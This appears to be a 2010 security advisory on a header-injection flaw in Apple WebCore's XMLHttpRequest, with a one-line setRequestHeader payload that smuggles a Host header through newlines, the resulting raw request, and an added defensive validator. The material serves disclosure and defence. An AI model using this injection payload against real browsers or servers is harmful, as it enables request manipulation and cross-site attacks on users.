Apple WebCore XMLHTTPRequest Cross-Site Scripting Vulnerability

An attacker can exploit this issue by enticing victims into visiting a malicious website.

The following example is available:

xmlhttp.setRequestHeader('Foo', 'baa\nHost: test\n');

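The above request is treated as valid: the newline characters in the header value are passed through unchanged, which results in a request carrying an injected Host header: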

GET / HTTP/1.1
Accept-Encoding: gzip, deflate
Accept-Language: en
Foo: baa
Host: test
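
As an added example (not part of the original advisory and not WebCore's code), the following shows the validation a client can apply before serializing request headers, run against the header value from the example above. The function names checkHeader, serializeHead and headerNames are hypothetical, and the check is deliberately strict: it rejects any CR, LF or NUL instead of trimming them.

```javascript
// Added example: hypothetical helper names, not taken from WebCore.
// Field names must be an RFC 7230 "token"; values must not contain
// CR, LF or NUL, because those end or corrupt a header line on the wire.
const TOKEN = /^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$/;
const FORBIDDEN_IN_VALUE = /[\r\n\0]/;

// Header pair from the advisory's setRequestHeader() example.
const SAMPLE = [['Foo', 'baa\nHost: test\n']];

function checkHeader(name, value) {
  if (typeof name !== 'string' || !TOKEN.test(name)) {
    throw new SyntaxError('invalid header name: ' + JSON.stringify(name));
  }
  const v = String(value);
  if (FORBIDDEN_IN_VALUE.test(v)) {
    throw new SyntaxError('invalid value for ' + name + ': ' + JSON.stringify(v));
  }
  // Only surrounding spaces and tabs are stripped; nothing else is rewritten.
  return [name, v.replace(/^[ \t]+|[ \t]+$/g, '')];
}

// Build the request head. With validate=false this reproduces the behaviour
// the advisory describes; with validate=true bad input is rejected.
function serializeHead(method, target, headers, validate) {
  const lines = [method + ' ' + target + ' HTTP/1.1'];
  for (const [name, value] of headers) {
    const [n, v] = validate ? checkHeader(name, value) : [name, value];
    lines.push(n + ': ' + v);
  }
  return lines.join('\r\n') + '\r\n\r\n';
}

// Header names a lenient receiver would see (accepts bare LF as a line end).
function headerNames(head) {
  return head.split(/\r?\n/).slice(1)
    .filter((line) => line.includes(':'))
    .map((line) => line.slice(0, line.indexOf(':')));
}
```

Without validation the receiver sees two headers, Foo and Host, from a single setRequestHeader call; with validation the same call throws before anything is serialized.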


 

Copyright 2010, SecurityFocus